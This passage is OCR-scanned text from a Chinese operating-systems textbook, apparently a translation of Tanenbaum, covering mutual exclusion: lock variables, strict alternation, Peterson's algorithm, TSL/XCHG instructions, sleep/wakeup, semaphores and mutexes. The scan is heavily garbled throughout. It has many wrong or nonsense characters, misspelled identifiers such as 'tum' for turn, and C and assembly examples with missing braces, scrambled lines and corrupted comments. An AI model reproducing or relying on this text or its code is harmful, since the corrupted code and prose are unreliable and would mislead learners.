CM) 变量 ， 其 初始 值 为 0。 当 一 个 进程 想 进 入 其 临界 区 时 ， 它 首先 测 
试 这 把 锁 。 如 果 该 锁 的 值 为 0， 则 该 进程 将 其 设置 为 1 并 进入 临界 区 。 春 
这 把 锁 的 值 己 经 为 1， 则 该 进程 将 等 竺 直到 其 值 变 为 0(。 于 是 ，0 惑 表示 
临界 区 内 没有 进程 ，1 表 示 已 经 有 茶 个 进程 进入 临界 区 。 








但 是 ， 这 种 想法 也 包含 了 与 假 脱 机 目录 一 样 的 下 漏 。 假 设 一 个 进程 
读 出 锁 变量 的 值 并 发 现 它 为 0， 而 恰好 在 它 将 其 值 设 置 为 1 之 前 ， 男 一 个 
进程 被 调度 运行 ， 将 该 锁 变 量 设 置 为 1。 当 第 一 个 进程 再 次 能 运行 时 ， 


它 同 样 也 将 该 锁 设 置 为 1， 则 此 时 同时 有 两 个 进程 进入 临界 区 中 。 


可 能 读者 会 想 ， 先 读 出 锁 变 量 ， 紧 接着 在 改变 其 值 之 前 再 检查 一 所 
它 的 值 ， 这 样 便 可 以 解决 问题 。 但 这 实际 上 无 济 于 事 ， 如 果 第 二 个 进程 
恰好 在 第 一 个 进程 完成 第 二 次 检查 之 后 修改 了 锁 变 量 的 值 ， 则 同样 还 会 
发 生 苋 搜 条 件 。 





3. 严 格 轮 换 法 





第 三 种 互 斥 的 方法 如 图 2-23 所 示 。 几 了 乎 与 本 书 中 所 有 其 他 程序 一 
样 ， 这 里 的 程序 段 用 C 语 言 编写 。 之 所 以 选择 C 语 言 是 由 于 实际 的 操作 
系统 普 裔 用 C 语 言 编 写 ( 或 偶尔 用 C++) ， 而 基本 上 不 用 像 Java、 
Modula3 或 Pascal 这 样 的 语言 。 对 于 编写 操作 系统 而 言 ，C 语 言 是 强大 、 
有 效 、 可 预知 和 有 特性 的 语言 。 而 对 于 Java， 它 就 不 是 可 预知 的 ， 因 为 
它 在 关键 时 刻 会 用 完 存 储 器 ， 而 在 不 合适 的 时 候 会 调用 垃圾 收集 程序 回 
收 内 存 。 在 C 语 言 中 ， 这 种 情形 就 不 可 能 有 发生， 因为 C 语 言 中 不 需要 进 
行 空 间 回收 。 有 关 C、C++、Java 和 其 他 四 种 语言 的 定量 比较 可 参阅 
(Prechelt, 2000) 。 














在 图 2-23 中 ， 整 型 变量 tum， 初 始 值 为 0， 用 于 记录 轮 到 哪个 进程 进 
入 临界 区 ， 并 检查 或 更 新 共享 内 存 。 开 始 时 ， 进 程 0 检 查 turn， 发 现 其 值 
为 0， 于 是 进入 临界 区 。 进 程 1 也 发 现 其 值 为 0， 所 以 在 一 个 等 待 循环 中 
不 停 地 测试 rm， 看 其 值 何 时 变 为 1。 连 续 测试 一 个 变量 直到 某 个 值 出 现 


为 止 ， 称 为 忙 等 待 Cbusy waiting) 。 由 于 这 种 方式 浪费 CPU 时 | 间 ， 所 以 


通 第 应 该 避免 。 


while (TRUE) { 
while (turn != 0) /# 循环 */ 
critical_region( ); 


while (TRUE) { i 
while (turn != 1) /* 循环 */ 


critical_region( ); 
turn = 0; 
noncritical_region( ); 


turn = 1; 
noncritical_region( ); 





a) b) 


图 2-23 临界 区 问题 的 一 种 解法 (在 两 种 情况 下 请 注意 分 号 终止 了 
while 4] ) : 引进 程 0; b421 


只 有 在 有 理由 认为 等 待 时 间 是 非常 短 的 情形 下 ， 才 使 用 忙 等 待 。 用 
Pile teat, PRA A EM (spin lock) 。 


进程 0 离开 临界 区 时 ， 它 将 tum 的 值 设置 为 1， 以 便 允 许 进程 1 进入 其 
临界 区 。 假 设 进程 1 很 快 便 离 开 了 临界 区 ， 则 此 时 两 个 进程 都 处 于 临界 
区 之 外 ，tum 的 值 又 被 设置 为 0。 现 在 进程 0 很 快 融 执 行 完 其 整个 循环 ， 
它 退 出 临界 区 ， 并 将 tum 的 值 设 置 为 |。 此 时 ，turn 的 值 为 1， 两 个 进程 
都 在 其 临界 区 外 执行 。 


突然 ， 进 程 0 结束 了 非 临 界 区 的 操作 并 且 返 回 到 循环 的 开始 。 但 
是 ， 这 时 它 不 能 进入 临界 区 ， 因 为 tm 的 当前 值 为 1， 而 此 时 进程 1 还 在 
忙于 非 临 界 区 的 操作 ， 进 程 0 只 有 继续 whbile 循 环 ， 直 到 进程 1 把 turn 的 值 
改 为 0。 这 说 明 ， 在 一 个 进程 比 力 一 个 慢 了 很 多 的 情况 下 ， 轮 流 进 入 临 


界 区 并 不 是 一 个 好 办 法 。 


这 种 情况 违反 了 前 面 叙 述 的 条 件 3: 进程 0 被 一 个 临界 区 之 外 的 进程 
了 咀 瞪 。 再 回 到 前 面 假 脱 机 目录 的 问题 ， 如 果 我 们 现在 将 临界 区 与 读 写 假 
脱 机 目录 相 联 系 ， 则 进程 0O 有 可 能 因为 进程 1 在 做 其 他 事情 而 被 茶 止 打印 
Fs 








实际 上 ， 该 方案 要 求 两 个 进程 严格 地 轮流 进入 它们 的 临界 区 ， 如 假 
脱 机 文件 等 。 任 何 一 个 进程 都 不 可 能 在 一 轮 中 打印 两 个 文件 。 尽 管 该 算 
法 的 确 避 免 了 所 有 的 苋 争 条 件 ， 但 由 于 它 违 反 了 条 件 3， 所 以 不 能 作为 
一 个 很 好 的 备 选 方案 。 


4.Peterson 解 法 


a 





fit = BUF ART. Dekker ai ee 5B ae ea, Be 
提出 了 一 个 不 需要 严格 轮换 的 软件 互 斥 算法 。 关 于 Dekker 的 算法 ， 请 参 
阅 (Dijkstra, 1965) 。 


1981 年 ，G.L.Peterson 发 现 了 一 种 简单 得 多 的 互 斥 算法 ， 这 使 得 
Dekker 的 方法 不 再 有 任何 新 意 。Peterson 的 算法 如 图 2-24 所 示 。 该 算法 
由 两 个 用 ANSI C 编 写 的 过 程 组 成 。ANSI C 要 求 为 所 定义 和 使 用 的 所 有 
函数 提供 函数 原型 。 不 过 ， 为 了 节省 篇 幅 ， 在 这 里 和 后 续 的 例子 中 我 们 
将 不 给 出 函数 原型 。 


#define FALSE 0 


#define TRUE 1 a Ste alt 
#define N 2 /* 进程 数量 */ 


int turn; /* 现在 轮 到 谁 ? */ 
int interested[N]; * 所 有 值 初始 化 为 0 (FALSE) */ 


1 E, 


void enter_region(int process); /* 进程 是 0 或 1 */ 


int other; /* 其 他 进程 号 */ 
other = 1 — process; [* 另 一 方 进程 #/ 
interested[process] = TRUE; /* et 感 兴趣 的 */ 
turn = process; /* 设置 标志 */ 

while (turn == process && interested[other] == TRUE)，/* 空 语句 */ 


} 
void leave_region(int process) /* PERE: 谁 离开 ? */ 


interested[process] = FALSE; 1* 表示 离开 临界 区 */ 





图 2-24 完成 互 斥 的 Peterson 解 法 


在 使 用 共享 变量 〈 即 进入 其 临界 区 ) 之 前 ， 各 个 进程 使 用 其 进程 号 
0 或 1 作为 参数 来 调用 enter_region。 该 调用 在 需要 时 将 使 进程 等 待 ， 直 到 
能 安全 地 进入 临界 区 。 在 完成 对 共 至 变量 的 操作 之 后 ， 进 程 将 调用 
leave_region， 表 示 操 作 已 完成 ， 右 其 他 的 进程 希望 进入 临界 区 ， 则 现在 
LAY DAE A. 











现在 来 看 看 这 个 方案 是 如 何 工作 的 。 一 开始 ， 没 有 任何 进程 处 于 临 
界 区 中 ， 现 在 进程 0 调用 enter_region。 它 通过 设置 其 数组 元 素 和 将 turn 置 
为 0 来 标识 它 希 望 进入 临界 区 。 由 于 进程 1 并 不 想 进 入 临界 区 ， 所 以 
enter_region 很 快 便 返 回 。 如 果 进 程 1 现在 调用 enter_region， 进 程 1 将 在 此 





处 挂 起 直到 interested[0] 变 成 FALSE， 访 事件 只 有 在 进程 0 调用 
leave_region 退 出 临界 区 时 才 会 发 生 。 


现在 考虑 两 个 进程 几乎 同时 调用 enter_region 的 情况 。 它 们 都 将 自己 
的 进程 号 存 入 tum， 但 只 有 后 被 保存 进去 的 进程 号 才 有 效 ， 前 一 个 因 被 
重 写 而 丢失 。 假 设 进程 1 是 后 存 入 的 ， 则 tum 为 1。 当 两 个 进程 都 运行 到 
while 语 句 时 ， 进 程 0 将 循环 0 次 并 进入 临界 区 ， 而 进程 1 则 将 不 停 地 循环 
且 不 能 进入 临界 区 ， 直 到 进程 0 退出 临界 区 为 止 。 





5.TSL 指 令 


现在 来 看 需要 硬件 支持 的 一 种 方案 。 某 些 计 算 机 中 ， 特 别 是 那些 设 
计 为 多 处 理 器 的 计算 机 ， 都 有 下 面 一 条 指令 : 





TSL RX, LOCK 





称 为 测试 并 加 锁 (Test and Set Lock) ， 它 将 一 个 内 存 字 lock 读 到 寄 
存 器 RX 中 ， 然 后 在 该 内 存 地 址 上 存 一 个 非 零 值 。 读 字 和 写字 操作 保证 
是 不 可 分 割 的 ， 即 该 指令 结束 之 前 其 他 处 理 器 均 不 允许 访问 该 内 存 字 。 
执行 TSL 指 令 的 CPU 将 锁 住 内 存 总 线 ， 以 禁止 其 他 CPU 在 本 指令 结束 之 
前 访问 内 存 。 


独 重 说 明 一 下 ， 锁 住 存 储 总 线 不 同 于 屏 刷 中断 。 屏 珊 中 断 ， 然 后 在 
读 内 存 字 之 后 跟着 写 操作 并 不 能 阻止 总 线 上 的 第 二 个 处 理 器 在 读 操作 和 











写 操作 之 间 访 问 该 内 存 字 。 事 实 上 ， 在 处 理 絮 1 上 屏蔽 中 断 对 处 理 占 2 根 
本 没有 任何 影响 。 让 处 理 器 2 远离 内 存 直 到 处 理 需 1 完成 的 惟一 方法 就 是 
锁 住 总 线 ， 这 需要 一 个 特殊 的 人 硬件 设施 《基本 上 ， 一 根 总 线 吕 可 以 确保 
总 线 由 锁 住 它 的 处 理 器 使 用 ， 而 其 他 的 处 理 器 不 能 用 ) 。 


为 了 使 用 TSL 指 令 ， 要 使 用 一 个 共享 变量 lock 来 协调 对 共享 内 存 的 
访问 。 当 lock 为 0 时 ， 任 何 进 程 都 可 以 使 用 TSL 指 令 将 其 设置 为 1， 并 读 
写 共 享 内 存 。 当 操作 结束 时 ， 进 程 用 一 条 普通 的 move 指 令 将 lock 的 值 重 
新 设置 为 0。 


这 条 指令 如 何 防止 两 个 进程 同时 进入 临界 区 呢 ? 解决 方案 如 图 2-25 
所 示 。 假 定 《但 很 典型 ) 存在 如 下 共 4 条 指令 的 汇编 语言 子 程序 。 第 一 
条 指令 将 lock 原 来 的 值 复制 到 寄存 器 中 并 将 lock 设 置 为 1， 随 后 这 个 原来 
的 值 与 0 相 比较 。 如 有 果 它 非 零 ， 则 说 明 以 前 已 被 加 锁 ， 则 程序 将 回 到 开 
始 并 再 次 测试 。 经 过 或 长 或 短 的 一 段 时 间 后 ， 该 值 将 变 为 0〈 当 前 处 于 
临界 区 中 的 进程 退出 临界 区 时 ) ， 于 是 过 程 返 回 ， 此 时 己 加 锁 。 要 清除 
这 个 锁 非 常 简单 ， 程 序 只 需 将 0 存 入 lock 即 可 ， 不 需要 特殊 的 同步 指 


令 。 








enter_region: 


TSL REGISTER,LOCK 制 锁 到 寄存 器 并 将 锁 设 为 1 
G El 了 ? 


CMP REGISTER,#0 (是 零 吧 
JNE enter_region 若 不 是 零 ， 说 明 锁 已 被 设置 ， 所 以 循环 


RET 


leave_region: 
MOVE LOCK,#0 | 在 锁 中 存 入 0 
RET 1 返回 调用 者 





图 2-25 用 TSL 指 令 进入 和 离开 临界 区 


现在 有 一 种 很 明确 的 解法 了 。 进 程 在 进入 临界 区 之 前 先 调用 
enter_region， 这 将 导致 忙 等 等 ， 直 到 锁 空间 为 止 ， 随 后 它 获 得 该 锁 并 返 
回 。 在 进程 从 临界 区 返回 时 它 调用 leave_region， 这 将 把 lock 设 置 为 0。 
与 基于 临界 区 问题 的 所 有 解法 一 样 ， 进 程 必须 在 正确 的 时 间 调 用 
enter_Tegion 和 1leave_region， 解 法 才能 奏效 。 如 果 一 个 进程 有 欺诈 行 
为 ， 则 互 斥 将 会 失败 。 


一 个 可 替代 TSL 的 指令 是 XCHG， 它 原子 性 地 交换 了 两 个 位 置 的 内 
容 ， 例 如 ， 一 个 寄存 器 与 一 个 存储 器 字 。 代 码 如 图 2-26 所 示 ， 而 且 就 像 
可 以 看 到 的 那样 ， 它 本 质 上 与 TSL 的 解决 办 法 一 样 。 所 有 的 Intel x86 
CPU 在 低层 同步 中 使 用 XCHG 指 令 。 





enter_region: 
MOVE REGISTER #1 | 在 寄存 器 中 放 一 个 1 
XCHG REGISTER,LOCK | 交换 寄存 器 与 锁 变量 的 内 容 
CMP REGISTER,#0 | 锁 是 零 吗 ? 
JNE enter_region | 若 不 是 零 ， 说 明 锁 已 被 设置 ， 因 此 循环 


RET | 返回 调用 者 ， 进 入 临界 区 


leave_region: 
MOVE LOCK,#0 | 在 锁 中 存 入 0 
RET 1 返回 调用 者 





图 2-26 用 XCHG 指 令 进 入 和 离开 临界 区 


2.3.4 睡眠 与 唤醒 


Peterson 解 法 和 TSL 或 XCHG 解 法 都 是 正确 的 ， 但 它们 都 有 忙 等 待 的 
缺点 。 这 些 解 法 在 本 质 上 是 这 样 的 : 当 一 个 进程 想 进 入 临界 区 时 ， 先 检 
查 是 否 允 许 进 入 ， 若 不 允许 ， 则 该 进程 将 原 地 等 待 ， 直 到 人 允许 为 止 。 





这 种 方法 不 仅 浪费 了 CPU 时 间 ， 而 且 还 可 能 引起 预想 不 到 的 结果 。 
考虑 一 台 计 算 机 有 两 个 进程 ，H 优 先 级 较 高 ， 工 优先 级 较 低 。 调 度 规则 
规定 ， 只 要 了 处 于 就 绪 态 它 就 可 以 运行 。 在 茶 一 时 刻 ， 工 处 于 临界 区 
中 ， 此 时 H 变 到 就 绪 态 ， 准 备 运 行 〈 例 如 ， 一 条 IO 操作 结束 ) . HEH 
开始 忙 等 待 ， 但 由 于 当 也 就 绪 时 L 不 会 被 调度 ， 也 束 无 法 离开 临界 区 ， 
所 以 H 将 永远 忙 等 待 下去。 这 种 情况 有 时 被 称 作 优先 级 反 转 问题 


(priority inversion problem) 。 








MERER J LER EAE IA fis EAT TCE A Ml Ft DX SAG BL 
塞 ， 而 不 是 忙 等 待 。 最 简单 的 是 sleep 和 wakeup 。sleep 是 一 个 将 引起 调 
用 进程 阻 豆 的 系统 调用 ， 即 被 挂 起 ， 直 到 另外 一 个 进程 将 其 唤醒 。 
wakeup 调 用 有 一 个 参数 ， 即 要 和 被 唤醒 的 进程 。 另 一 种 方法 是 让 sleep 和 
wakeup 各 有 一 个 参数 ， 即 有 一 个 用 于 匹配 sleep 和 wakeup 的 内 存 地 址 。 





生产 者 -消费 者 问题 


作为 使 用 这 些 原 语 的 一 个 例子 ， 我 们 考虑 生产 者 -消费 者 
(producer-consumer) 问题 ， 也 称 作 有 界 缓冲 区 (bounded-buffer) 问 
题 。 两 个 进程 共享 一 个 公共 的 固定 大 小 的 缓冲 区 。 其 中 一 个 是 生产 者 ， 
将 信息 放 入 缓冲 区 ; 另 一 个 是 消费 者 ， 从 缓冲 区 中 取出 信息 。 《也 可 以 
把 这 个 问题 一 般 化 为 m 个 生产 者 和 n 个 消费 者 问题 ， 但 是 我 们 只 讨论 一 
个 生产 者 和 一 个 消费 者 的 情况 ， 这 样 可 以 简化 解决 方案 。) 


问题 在 于 当 缓 冲 区 已 满 ， 而 此 时 生产 者 还 想 辐 其 中 放 入 一 个 新 的 数 
所 项 的 情况 。 其 解决 共 法 是 让 生产 者 睡眠 ， 竺 消费 者 从 缓冲 区 中 取出 一 
个 或 多 个 数据 项 时 再 唤醒 它 。 同 样 地 ， 当 消费 者 试图 从 缓冲 区 中 取 数 据 
而 发 现 缓冲 区 为 空 时 ， 消 费 者 就 睡眠 ， 直 到 生产 者 癌 其 中 放 入 一 些 数据 
时 再 将 其 唤醒 。 





这 个 方法 听 起 来 很 简单 ， 但 它 包 含 与 前 边 假 脱 机 目录 问题 一 样 的 苋 
争 条 件 。 为 了 跟踪 缓冲 区 中 的 数据 项 数 ， 我 们 需要 一 个 变量 count。 如 
果 绥 冲 区 最 多 存放 N 个 数据 项 ， 则 生产 者 代码 将 首先 检查 count 是 否 达 到 
N， 大 是 ， 则 生产 者 睡眠 ， 耕 则 生产 者 癌 缓 冲 区 中 放 入 一 个 数据 项 并 增 


量 count 的 值 。 


消费 者 的 代码 与 此 类 似 ， 首先 测 斌 count 是 否 为 0， 若 是 ， 则 睡眠 ; 
否则 从 中 取 走 一 个 数据 项 并 递减 count 的 值 。 每 个 进程 同时 也 检测 另 一 
个 进程 是 否 应 被 唤醒 ， 若 是 则 唤醒 之 。 生 产 者 和 消费 者 的 代码 如 图 2-27 
所 示 。 


#define N 100 Jx 缓冲 区 中 的 槽 数目 */ 
int count = 0; 此 缓冲 区 中 的 数据 项 数目 */ 


void producer(void) 


{ 


int item; 


i /* 无 限 循环 */ 
eat o_o ); Wak EF- -新 数据 项 i 
if (count == N) sleep( ); /* 如 果 缓 冲 区 满 了 ， 就 进入 休眠 状态 */ 
insert_item(item); PR CB) 数据 项 放 入 缓冲 区 中 */ 
count = count + 1; /* 将 缓冲 区 的 数据 项 计数 器 增 1 */ 
if (count == 1) wakeup(consumer); /* 缓冲 区 空 吗 ? */ 


void consumer(void) 
int item; 
/* ERII */ 
i A : /* 如 果 缓 冲 区 空 ， 则 进入 休眠 状态 */ 
hee pm ae p+ 从 缓冲 区 中 取出 一 个 数据 项 */ 
item = remove_item(); ee Ce ee ce 
count = count — 1; /* 将 缓冲 区 的 数据 项 计数 器 减 1 */ 
if (count == N — 1) wakeup(producen); /* 绥 冲 区 满 吗 ? */ 
consume _item(item); /* 打印 数据 项 */ 


while (TRUE) { 





图 2-27 含有 严重 竞争 条 件 的 生产 者 -消费 者 问题 





为 了 在 C 语 言 中 表示 sleep 和 wakeup 这 样 的 系统 调用 ， 我 们 将 以 库 函 
数 调用 的 形式 来 表示 。 尽 管 它们 不 是 标准 C 库 的 一 部 分 ， 但 在 实际 上 任 
何 系统 中 都 具有 这 些 库 函 数 。 未 列 出 的 过 程 insert_item 和 remove_item 用 
来 记录 将 数据 项 放 入 缓冲 区 和 从 缓冲 区 取出 数据 等 事项 。 








现在 回 到 竞争 条 件 的 问题 。 这 里 有 可 能 会 出 现 苋 争 条 件 ， 其 原因 是 
对 count 的 访问 未 加 限制 。 有 可 能 出 现 以 下 情况 : 缓冲 区 为 空 ， 消 费 者 
刚刚 读 取 count 的 值 发 现 它 为 0。 此 时 调 有 程序 决定 暂停 消费 者 并 局 动 运 





行 生 产 者 。 生 产 者 同 缓 冲 区 中 加 入 一 个 数据 项 ，count 加 1。 现 在 count 的 
值 变 成 了 1。 它 推断 认为 由 于 count 刚 才 为 0， 所 以 消费 者 此 时 一 定 在 睡 
眠 ， 于 是 生产 者 调用 wakeup 来 唤醒 消费 者 。 








但 是 ， 消 费 者 此 时 在 逻辑 上 并 未 睡眠 ， 所 以 wakeup 信 号 丢失 。 当 消 
费 者 下 次 运行 时 ， 它 将 测试 先前 读 到 的 count 值 ， 发 现 它 为 0， 于 是 睡 
眼 。 生 产 者 迟早 会 填 满 整个 缓冲 区 ， 然 后 睡眠 。 这 样 一 来 ， 两 个 进程 都 
将 永远 睡眠 下 去 。 








问题 的 实质 在 于 发 给 一 个 〈 尚 ) 未 睡眠 进程 的 wakeup 信 号 丢失 了 。 
如 果 它 没有 丢失 ， 则 一 切 都 很 正常 。 一 种 快速 的 弥补 方法 是 修改 规则 ， 
加 上 一 个 唤醒 等 待 位 。 当 一 个 wakeup 信 号 发 送 给 一 个 清醒 的 进程 信号 
时 ， 将 该 位 置 1。 随 后 ， 当 该 进程 要 睡眠 时 ， 如 末 唤 醒 等 待 位 为 1， 则 将 
该 位 清除 ， 而 该 进程 仍然 保持 清醒 。 唤 醒 等 竺 位 实际 上 就 是 wakeup 信 和 号 
的 一 个 小 仓库 。 





尽管 在 这 个 简单 例子 中 用 唤醒 等 竺 位 的 方法 解决 了 问题 ， 但 是 我 们 
很 容易 融 可 以 构造 出 一 些 例子 ， 其 中 有 三 个 或 更 多 的 进程 ， 这 时 一 个 唤 
醒 等 竺 位 就 不 够 使 用 了 。 于 是 我 们 可 以 再 打 一 个 补丁 ， 加 入 第 二 个 唤醒 
等 待 位， 甚至 是 8 个 、32 个 等 ， 但 原则 上 讲 ， 这 并 没有 从 根本 上 解决 问 





信号 量 是 E.W.Dijkstra 在 1965 年 提出 的 一 种 方法 ， 它 使 用 一 个 整 型 
变量 来 累计 唤醒 次 数 ， 供 以 后 使 用 。 在 他 的 建议 中 引入 了 一 个 新 的 变量 
类 型 ， 称 作 信 和 号 量 (semaphore) 。 一 个 信号 量 的 取 值 可 以 为 0 〈 表 示 没 


有 保存 下 来 的 唤醒 操作 ) 或 者 为 正 值 表示 有 一 个 或 多 个 唤醒 操作 ) 。 


Dijkstra 建 议 设立 两 种 操作 : down 和 up 分 别 为 一 般 化 后 的 sleep 和 和 
wakeup) 。 对 一 信号 量 执行 own 操作 ， 则 是 检查 其 值 是 否 大 于 0。 大 该 
值 大 于 0， 则 将 其 值 减 1( 即 用 挥 一 个 保存 的 唤醒 信 与 〉 并 继续 ;， 奋 该 值 
为 0， 则 进程 将 睡眠 ， 而 且 此 时 down 操 作 并 未 结束 。 检 查 数 值 、 修 改变 
量 值 以 及 可 能 发 生 的 睡眠 操作 均 作 为 一 个 单一 的 、 不 可 分 割 的 原子 操作 
完成 。 保 证 一 旦 一 个 信号 量 操作 开始 ， 则 在 该 操作 完成 或 阻塞 之 前 ， 其 
他 进程 均 不 允许 访问 该 信号 量 。 这 种 原子 性 对 于 解决 同步 问题 和 避免 况 
和 搜 条 件 是 绝对 必要 的 。 所 谓 原子 操作 ， 是 指 一 组 相关 联 的 操作 要 么 都 不 
间断 地 执行 ， 要 么 部 不 执行 。 原 子 操作 在 计算 机 科学 的 其 他 领域 也 是 非 


常 重 要 的 。 




















up 操作 对 信号 量 的 值 增 1。 如 果 一 个 或 多 个 进程 在 该 信号 量 上 睡 
眠 ， 无 法 完成 一 个 先前 的 down 操 作 ， 则 由 系统 选择 其 中 的 一 个 “如 随 
机 挑选 ) 并 人 允许 该 进程 完成 它 的 down 操 作 。 于 是 ， 对 一 个 有 进程 在 其 


上 睡眠 的 信号 量 执行 一 次 up 操作 之 后 ， 该 信号 量 的 值 仍旧 是 0， 但 在 其 
上 睡眠 的 进程 却 少 了 一 个 。 信 和 号 量 的 值 增 1 和 唤醒 一 个 进程 同样 也 是 不 
可 分 割 的 。 不 会 有 某 个 进程 因 执行 up 而 阻塞 ， 正 如 在 前 面 的 模型 中 不 会 
有 进程 因 执行 wakeup 而 阻塞 一 样 。 





如 


顺便 提 一 下 ， 在 Dijkstra 原 来 的 论文 中 ， 他 分 别 使 用 名 称 P 和 V 而 不 
是 down 和 up， 和 荷兰 语 中 ，Proberen 的 意思 是 尝试 ，Verhogen 的 含义 是 增 
加 或 升 高 。 由 于 对 于 不 讲 荷兰 语 的 读者 来 说 采用 什么 记号 并 无 大 的 干 
系 ， 所 以 我 们 将 使 用 down 和 up 名 称 。 它 们 在 程序 设计 语言 Algol 68 中 首 
次 引信， 


用 信号 量 解决 生产 者 -消费 者 问题 





用 信号 量 解决 丢失 的 wakeup 问 题 ， 如 图 2-28 所 示 。 为 确保 信号 量 能 
正确 工作 ， 最 重要 的 是 要 采用 一 种 不 可 分 割 的 方式 来 实现 它 。 通 常 是 将 
up 和 down 作 为 系统 调用 实现 ， 而 且 操作 系统 只 需 在 执行 以 下 操作 时 和 暂 
时 屏蔽 全 部 中 断 : 测试 信号 量 、 更 新 信号 量 以 及 在 需要 时 使 某 个 进程 睡 
眠 。 由 于 这 些 动作 只 需要 几 条 指令 ， 所 以 屏蔽 中 断 不 会 带 来 什么 副 作 
用 。 如 果 使 用 多 个 CPU， 则 每 个 信号 量 应 由 一 个 锁 变 量 进 行 保 护 。 通 过 
TSL 或 XCHG 指 令 来 确保 同一 时 刻 只 有 一 个 CPU 在 对 信号 量 进行 操作 。 











读者 必须 搞 清 楚 ， 使 用 TSL 或 XCHG 指 令 来 防止 几 个 CPU 同时 访问 
一 个 信号 量 ， 这 与 生产 者 或 消费 者 使 用 忙 等 竺 来 等 待 对 方 腾 出 或 填充 组 








冲 区 是 完全 不 同 的 。 信 号 量 操作 仪 需 几 个 坚 秒 ， 而 生产 者 或 消费 者 则 可 
能 需要 任意 长 的 时 间 。 


该 解决 方案 使 用 了 三 个 信号 量 : 一 个 称 为 fall， 用 来 记录 充满 的 组 
冲 槽 数目， 一 个 称 为 empty， 记 录 空 的 缓冲 槽 总 数 ， 一 个 称 为 mutex， 用 
来 确保 生产 者 和 消费 者 不 会 同时 访问 缓冲 区 。fall 的 初 值 为 0，empty 的 
初 值 为 缓冲 区 中 槽 的 数目 ，mutex 初 值 为 1。 供 两 个 或 多 个 进程 使 用 的 信 
号 量 ， 其 初 值 为 1， 保 证 同时 只 有 一 个 进程 可 以 进入 临界 区 ， 称 作 二 元 
信号 量 (binary semaphore) 。 如 果 每 个 进程 在 进入 临界 区 前 都 执行 一 个 
down 操 作 ， 并 在 刚刚 退出 时 执行 一 个 up 操作 ， 就 能 够 实现 互 斥 。 


在 有 了 一 些 进 程 间 通 信 穆 语 之 后 ， 我 们 再 观察 一 下 图 2-5 中 的 中 断 
顺序 。 在 使 用 信号 量 的 系统 中 ， 隐 藏 中 断 的 最 自然 的 方法 是 为 每 一 个 
IO 设备 设置 一 个 信号 量 ， 其 初 值 为 0。 在 启动 一 个 IO 设备 之 后 ， 管 理 进 
程 就 立即 对 相关 联 的 信 写 量 执行 一 个 down 操 作 ， 于 是 进程 立即 被 阻 
塞 。 当 中 断 到 来 时 ， 中 断 处 理 程序 随后 对 相关 信号 量 执行 一 个 up 操作 ， 
从 而 将 相关 的 进程 设置 为 就 绪 状 态 。 在 该 模型 中 ， 图 2-5 中 的 第 5 步 包括 
在 设备 的 信号 量 上 执行 up 操作 ， 这 样 在 第 6 步 中 ， 调 度 程序 将 能 执行 设 
备 管理 程序 。 当 然 ， 如 果 这 时 有 几 个 进程 就 绪 ， 则 调度 程序 下 次 可 以 选 
择 一 个 更 为 重要 的 进程 来 运行 。 在 本 章 的 后 续 内 容 中 ， 我 们 将 看 到 调度 
算法 是 如 何 进行 的 。 

















在 图 2-28 的 例子 中 ， 我 们 实际 上 有 是 通过 两 种 不 同 的 方式 来 使 用 信和 号 





量 ， 两 者 之 间 的 区 别 是 很 重要 的 。 信 号 量 mutex 用 于 互 斥 ， 它 用 于 保证 
任 一 时 刻 只 有 一 个 进程 读 写 缓冲 区 和 相关 的 变量 。 互 斥 是 避免 混乱 所 必 
需 的 操作 。 在 下 一 节 中 ， 我 们 将 讨论 互 斥 量 及 其 实现 方法 。 





#define N 100 

typedef int semaphore; 
semaphore mutex = 1; 
semaphore empty = N; 
semaphore full = 0; 


void producer(void) 


int item; 


while (TRUE) { 


item = produce_item( ); 


down(&empty); 
down(&mutex); 
insert_item(item); 
up(&mutex); 
up(&full); 


void consumer(void) 
int item; 
while (TRUE) { 


down(&full); 
down(&mutex); 


item = remove_item(); 


up(&mutex); 


up(&empty); 
consume _item(item); 


必 缓 冲 区 中 的 模 数 目 */ 

必 信号 量 是 一 种 特殊 的 整 型 数据 */ 
/* 控制 对 临界 区 的 访问 */ 

/* 计数 缓冲 区 的 空 槽 数目 */ 

/* 计数 缓冲 区 的 满 模 数目 */ 


/TRUE 是 常量 1 */ 

/* 产生 放 在 缓冲 区 中 的 一 些 数 据 */ 
少将 空 槽 数目 减 1 */ 

/* BEAM ALK */ 

/* 将 新 数据 项 放 到 缓冲 区 中 */ 

必 离开 临界 区 */ 

/* 将 满 档 的 数目 加 1 */ 


/* 无 限 循环 */ 

/* 将 满 档 数目 减 1 */ 

/* BEAM ALK */ 

1® 从 缓冲 区 中 取出 数据 项 */ 
* 离开 临界 区 */ 

必 将 空 槽 数目 加 1 */ 

/* 处 理 数 据 项 */ 





图 2-28 使 用 信号 量 的 生产 者 -消费 者 问题 





信号 量 的 另 一 种 用 途 是 用 于 实现 同步 (synchronization) 。 信 号 量 
ful 和 empty 用 来 保证 茶 种 事件 的 顺序 发 生 或 不 发 生 。 在 本 例 中 ， 它 们 保 
证 当 绥 冲 区 满 的 时 候 生产 者 停止 运行 ， 以 及 当 绥 冲 区 衬 的 时 候 消费 者 停 
止 运行 。 这 种 用 法 与 互 斥 是 不 同 的 。 
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如 果 不 需 要 信和 号 量 的 计数 能 力 ， 有 时 可 以 使 用 信号 量 的 一 个 简化 版 
AS, PRA ARE (mutex) 。 互 斥 量 仅仅 适用 于 管理 共有 资源 或 一 小 段 
代码 。 由 于 互 斥 量 在 实现 时 既 容 易 双 有效， 这 使 得 互 斥 量 在 实现 用 户 空 
间 线 程 包 时 非常 有 用 。 





互 斥 量 是 一 个 可 以 处 于 两 态 之 一 的 变量 : 解锁 和 加 锁 。 这 样 ， 只 天 
要 一 个 二 进 制 位 表示 它 ， 不 过 实际 上 ， 旬 和 间 使 用 一 个 整 型 量 ，0 表 示 解 
锁 ， 而 其 他 所 有 的 值 则 表示 加 锁 。 互 斥 量 使 用 两 个 过 程 。 当 一 个 线程 
《或 进程 )》 需 要 访问 临界 区 时 ， 它 调用 mnutex_lock。 如 条 该 互 斥 量 当 前 
是 解锁 的 〈 即 临界 区 可 用 ) ， 此 调用 成 功 ， 调 用 线程 可 以 目 由 进入 该 临 
界 区 。 





男 一 方面 ， 如 果 该 互 斥 量 已 经 加 锁 ， 调 用 线程 被 阻塞 ， 直 到 在 临界 
区 中 的 线程 完成 并 调用 mutex_unlock。 如 果 多 个 线程 被 阻塞 在 该 互 斥 量 
上 ， 将 随机 选择 一 个 线程 并 允许 它 获 得 锁 。 





由 于 互 斥 量 非 党 简单， 所 以 如 果 有 可 用 的 TSL 或 XCHG 指 令 ， 就 可 
